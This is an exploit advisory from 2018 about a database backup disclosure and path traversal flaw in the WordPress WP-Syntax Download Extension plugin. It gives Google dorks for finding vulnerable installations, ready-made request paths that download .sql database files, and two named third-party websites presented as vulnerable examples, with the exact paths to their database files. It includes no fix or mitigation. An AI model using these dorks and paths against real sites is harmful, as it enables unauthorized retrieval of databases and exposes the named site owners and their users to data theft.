#################################################################################

# Exploit Title : WordPress WP-Syntax Download Extension Plugins 1.1.1
Database Backup Disclosure

# Exploit Title : WordPress WP-Syntax Download Extension Plugins 1.1.1
Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 06/12/2018
# Vendor Homepage : wordpress.org/plugins/wp-syntax-download-extension/
+ blog.akinori.org/2010/03/26/wp-syntax-download-extension/
# Software Download Link :
downloads.wordpress.org/plugin/wp-syntax-download-extension.1.1.1.zip
+ github.com/knu/wp-syntax-download-extension/archive/master.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0 and 1.1.1
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-syntax-download-extension/''
+ intext:''Theme by Altis. Proudly powered by WordPress''
+ intext:''Made with Love by Graphene Themes''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/.......

/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
[RANDOM-NUMBERS-HERE]/hello.sql

/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
1439/hello.sql

/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
1439/[RANDOM-DATABASE-NAME.sql]

/wordpress/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
[RANDOM-NUMBERS-HERE]/1-AllApps-prio-and-appname.sql

/wordpress/wp-content/plugins/wp-syntax-download-extension/wp-syntax-download-extension.php/
[RANDOM-NUMBERS-HERE]/[RANDOM-DATABASE-NAME.sql]

#################################################################################

# Example Vulnerable Site =>

[+] cx20.main.jp/blog/hello/wp-content/plugins/wp-syntax-download-extension/
wp-syntax-download-extension.php/1439/hello.sql

[+] vroom.cc/wordpress/wp-content/plugins/wp-syntax-download-extension/
wp-syntax-download-extension.php/175/1-AllApps-prio-and-appname.sql

#################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################